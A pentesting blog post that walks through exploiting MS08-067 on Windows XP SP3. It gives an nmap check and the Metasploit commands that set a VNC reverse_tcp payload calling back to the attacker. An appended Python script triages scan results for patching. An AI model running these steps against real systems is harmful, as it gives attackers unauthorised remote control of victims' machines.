Zer0 day

[Pentesting] XP sp3 Remote Exploit with ms08_067



Zero Day 2014. 4. 27. 02:39

- XP sp3 Remote Exploit with ms08_067


Vulnerability : MS08_067




Platforms : Windows 


Architectures : x86


Target : ( Windows XP sp3 )


Attacker : ( Linux BackTrack5-R3 )



- Process -

This time we will exploit Windows XP SP3 using the MS08_067 vulnerability.

MS08_067 :

When the system receives a crafted RPC request, it allows remote code execution.

Windows 2000, Windows XP, and Windows Server 2003 have this vulnerability.

So an attacker can execute any command on the victim's PC without any authentication.

1. First, we need to check with the Nmap tool whether the PC might have the MS08_067 vulnerability.

   If the vulnerability has already been patched, we can't exploit it.



 Command : nmap -sS -A --script=smb-check-vulns -PO [Victim's IP]
In this case, we can't exploit... so..
2. Next, we will use the module called "ms08_067_netapi".
Cmd : search ms08_067


3. Use it!
Cmd : use exploit/windows/smb/ms08_067_netapi
4. Time to set the payload!
This time we will use the windows/vncinject/reverse_tcp payload.
Set LHOST ( my IP ), LPORT ( my port ), RPORT ( 445 ), and RHOST ( victim IP ).


- Exploit Success!


If the exploit succeeds, you can see the VNC screen on your screen.
- If you can't see the VNC screen even though the exploit succeeded, VNC isn't installed on your PC.
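
The patch check from step 1 is also what a defender runs to decide which hosts still need the MS08_067 fix. The following is an added example, not part of the original post: it sorts hosts from nmap smb-check-vulns output into patch-triage buckets. The sample output is constructed (modeled on the script's report format, with documentation addresses), and the `triage` function and bucket names are assumptions made for this illustration.

```python
import re

# Constructed sample of nmap normal output; not taken from a real scan.
SAMPLE = """\
Nmap scan report for 192.0.2.10
Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|_  Conficker: Likely CLEAN

Nmap scan report for fileserver.example (192.0.2.11)
Host script results:
| smb-check-vulns:
|_  MS08-067: NOT VULNERABLE

Nmap scan report for 192.0.2.12
Host script results:
| smb-check-vulns:
|_  MS08-067: LIKELY VULNERABLE (host stopped responding)

Nmap scan report for 192.0.2.13
445/tcp filtered microsoft-ds
"""

# Host header with or without a resolved name (IPv4 only in this example).
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9.]+)\)?$")
VULN_RE = re.compile(r"^\|[_ ]\s+MS08-067:\s*(.+)$")

def triage(nmap_text):
    """Map each scanned host to a patch-triage bucket for MS08-067."""
    results, host = {}, None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            host = m.group(1)
            results[host] = "unknown"      # no script verdict seen yet
            continue
        m = VULN_RE.match(line)
        if m and host:
            status = m.group(1).upper()
            if status.startswith("NOT VULNERABLE"):
                results[host] = "patched"
            elif "VULNERABLE" in status:   # VULNERABLE or LIKELY VULNERABLE
                results[host] = "patch-now"
    return results

if __name__ == "__main__":
    for ip, bucket in sorted(triage(SAMPLE).items()):
        print(f"{ip:15} {bucket}")
```

Hosts left in the "unknown" bucket returned no verdict (for example, port 445 filtered) and need a manual check of their patch level.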



- End
